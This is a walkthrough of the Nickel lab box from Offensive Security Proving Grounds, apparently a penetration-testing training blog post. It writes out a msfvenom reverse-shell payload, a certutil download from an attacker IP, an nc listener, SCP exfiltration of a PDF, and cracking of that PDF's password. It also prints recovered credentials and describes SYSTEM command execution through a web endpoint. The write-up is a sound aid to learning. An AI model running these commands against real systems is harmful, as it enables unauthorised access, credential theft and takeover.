PG Practice - Nickel Walkthrough

Introduction

In this post, an in-depth look at Nickel, a challenging box categorized as from the Offensive Security Proving Grounds Practice Labs

Summary

The initial reconnaissance on the Nickel box commenced with an NMAP scan, revealing an open FTP service on port 21. Attempts to log in anonymously were unsuccessful. Subsequently, attention was directed to a webserver operating on port 8089, where a DevOps dashboard was identified.

Further exploration of other endpoints on the webpage led to the /list-running-procs? endpoint, which intriguingly redirected to the BOX’s IP on port 33333. An initial GET request yielded no results. However, a subsequent POST request returned a response, albeit requiring a content length header. Upon adding this, a list of running processes was retrieved.

Among these processes, SSH credentials were found hard-coded, with the password being base64 encoded. Decoding the password facilitated gaining initial access through SSH to Nickel.

Post-compromise enumeration uncovered an Infrastructure.pdf file, which was exfiltrated via SCP. The file was password-protected and the password was subsequently cracked using Pdfcrack, aided by the rockyou wordlist.

The information gleaned from the cracked PDF file revealed previously inaccessible internal endpoints. Particularly noteworthy was a temporary command execution endpoint. Remote Code Execution (RCE) was achieved by making an API GET request using PowerShell, allowing for the execution of commands remotely.

The execution of the command whoami /priv revealed that the endpoint operated with SYSTEM privileges. This discovery enabled privilege escalation by adding the user ariah to the local administrators group, granting access to read the proof.txt file.

NMAP Scan Starting off with an NMAP scan:

Nmap scan report for 192.168.152.99
Host is up, received echo-reply ttl 125 (0.053s latency).
Scanned at 2023–06–22 15:38:08 EDT for 190s
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd
| ftp-syst: 
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYR4Bx82VWETlsjIFs21j6lZ6/S40jMJvuXF+ay4Qz4b+ws2YobB5h0+IrHdr3epMNFmSY8JXFWzIILhkvF/rmadXRtGwib1VZkSa3nr5oYdMajoWK0jOVSoFJmDTJvhj+T3XE7+Q0tEkQ2EeGPrz7nK5XWzBp8SZdywCE/iz1HLvUIlsOqpDWHSjrnjkUaaleTgoVTEi63Dx4inY2KS5mX2mnS/mLzMlLZ0qj8vL9gz6ZJgf7LMNhXb/pWOtxfn6zmSoVHXEXgubXwLtrn4wOIvbZkm5/uEx+eFzx1AOEQ2LjaKItEqLlP3E5sdutVP6yymDTGBtlXgfvtfGS2lgZiitorAXjjND6Sqcppp5lQJk2XSBJC58U0SzjXdyflJwsus5mnKnX79nKxXPNPwM6Z3Ki1O9vE+KsJ1dZJuaTINVgLqrgwJ7BCkI2HyojfqzjHs4FlYVHnukjqunG90OMyAASSR0oEnUTPqFmrtL/loEc3h44GT+8m9JS1LgdExU=
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDJYE805huwKUl0fJM8+N9Mk7GUQeEEc5iA/yYqgxE7Bwgz4h5xufRONkR6bWxcxu8/AHslwkkDkjRKNdr4uFzY=
| 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL8cLYuHBTVFfYPb/YzUIyT39bUzA/sPDFEC/xChZyZ4
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2023–06–22T19:41:17+00:00; -1s from scanner time.
| rdp-ntlm-info: 
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023–06–22T19:40:11+00:00
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023–06–21T19:35:40
| Not valid after: 2023–12–21T19:35:40
| MD5: 16c3:ee72:4391:21d6:b8e7:a8d9:e921:abe5
| SHA-1: 4e4e:fcef:fdb0:9c7f:bdb7:ae33:1f84:5668:9b84:5ac9
| - - -BEGIN CERTIFICATE - - -
| MIIC0DCCAbigAwIBAgIQZijV5X0sNb5DkBDJWR0jFjANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZuaWNrZWwwHhcNMjMwNjIxMTkzNTQwWhcNMjMxMjIxMTkzNTQw
| WjARMQ8wDQYDVQQDEwZuaWNrZWwwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDly/vmp00kCX31dd9QTeRGu3ItdtQNYM4TJrK99vAuh5uDYWlr5f6VRUZb
| toKy2GCJLwTATLU7GOiOu/Q1asag3CitGi01gq23WEkOgrBW2+AyKi38R1+hYsFn
| 1wHH5HlUbTQN33yhDVXwPdxnqXh1oAiCBvOOZfBSiAgWTUBooA7YM9tJVmtkT+bi
| DYaG3ZF4RS3shMquqEg9490Tto4RN3USeuzLEDZXLAiQeapL3ZbPcNGZHEWPduZN
| 6yfEryzOh535Kg6Nkte/aapnwit/HFJN/drCKxciizU+/ahUOXVvmuSppInMVftT
| bj01sS5csyHdOKetsc16+OsRg+6dAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEANrhN4oEhJbGfGQWz
| iRkCSOP3sqGu0LeFa4ypE099fLRXQ0nGlY7B1zUDl+sdZYV/MtfDwzBW5Y+RM9IV
| 8FJvNdevJrFn7+SVvCD7Sf/ENgZn0hDZB2/HIvEb0BKDE6VE43MeZjvjz+ZSS2hC
| 0TcqnwyErVYbXm5p4lbBz00PCr9OqHPmwZ/YaCq6OGsSn8mByKZs8SVROiP3hbGJ
| xKBy1Y/cvudTfuSmi/wiOlvu0FgcLUKEoUsIWZ/xKhkhNkeJAA/ag5NJyyJy/m0N
| d2emyLQPKouNdx8jAic6iR+GkFKmXVMkhVWE6+On8Sg95vp9spYJuQiUc9e1inNi
| OteF/w==
|_ - - -END CERTIFICATE - - -
8089/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
| http-methods: 
|_ Supported Methods: GET
|_http-title: Site doesn't have a title.
33333/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
| http-methods: 
|_ Supported Methods: GET POST
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Always try the low hanging fruit first, the FTP service on port 21 is not accepting anonymous logins

Information Gathering

Webserver on port 8089

The next target of interest is the HTTP webserver on port 8089.

Navigating to List Running Processes redirects to port 33333.

Doing a GET request on NICKEL:33333 returns the following:

A POST request returns.

The highlighted error in the HTTP Response states that the POST request requires a content length.

A list of running processes was successfully retrieved. The significant discovery in this list was the presence of SSH credentials belonging to the user ariah. Notably, the password associated with these credentials appeared to be encoded in base64.

Decoding the base64 returns a password.

echo "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" | base64 -d

Initial Access

Upon enumerating the webserver on port 8089, SSH credentials were found within the list of running processes. The initial access point into Nickel is via SSH.

ssh ariah@192.168.152.99

Reverse Shell

To gain a reverse shell, the next step involves generating a payload using MSFVENOM:

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > shell.exe

The MSFVENOM generated payload can be transferred either through SCP or by leveraging certutil.

SCP Method

scp shell.exe ariah@192.168.152.99:C:/users/ariah/

Certutil Method

In order to use this method, the payload must be hosted on a webserver, specifically on port 80. The box restricts outbound traffic, however, it does accept connections on port 80 from any available interface.

To check check what ports are listening for outbound traffic:

netstat -ano

Use Python to set up a webserver on port 80.

python3 -m http.server 80

Download the payload using certutil

certutil.exe -urlcache -f -split "http://192.168.45.218/shell.exe"

Terminate the HTTP server and set up a listener on port 80

rlwrap nc -lvnp 80

Execute the payload on the SSH session to gain a reverse shell

.\shell.exe

Post-Compromise Enumeration

Users

whoami /priv

net users

User Files and Folders

At the root of the C:\ drive, a folder named FTP can be found. This folder houses the previously inaccessible FTP service. The folder contains an interesting PDF file: Infrastructure.pdf.

The PDF file can be transferred to our local machine via SCP.

scp ariah@192.168.152.99:C:/ftp/Infrastructure.pdf .

The PDF file is password protected.

The tool Pdfcrack will be used to crack the password-protected PDF file, leveraging the rockyou wordlist.

pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt

The password ‘ariah4168’ was successfully recovered.

Post-Compromise Exploitation

The cracked PDF file reveals interesting information, such as the presence of more web servers. A key finding is a temporary command endpoint that could be exploited using RCE.

A temporary command endpoint is identified at http://nickel/?. This endpoint can be interacted with using PowerShell to send GET requests to the API endpoint. This is done using the Invoke-WebRequest command along with the -UseBasicParsing parameter.

$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing

The command $Resp = Invoke-WebRequest ‘http://nickel/?whoami' -UseBasicParsing is executed, running whoami and returning the output. This output is stored in the variable $Resp.RawContent, which holds the raw, unprocessed HTTP response. This can include a range of information, such as the status line, headers, and body content.

$Resp.RawContent

When the output from the $Resp.RawContent variable was inspected, it was revealed that Remote Code Execution (RCE) with SYSTEM privileges had been achieved. However, due to outbound traffic being blocked, spawning a secondary reverse shell with SYSTEM privileges was not possible. Despite this limitation, the ability to execute commands as SYSTEM remained, which enabled the addition of the current user, ‘ariah’, to the Administrators group.

Conclusion

Alternatively, there’s also the option to gain a reverse shell by leveraging the same API GET request. This can be done either by executing the same MSFVENOM payload previously uploaded to the C:\users\ariah directory or by using CURL to the same temporary command execution endpoint.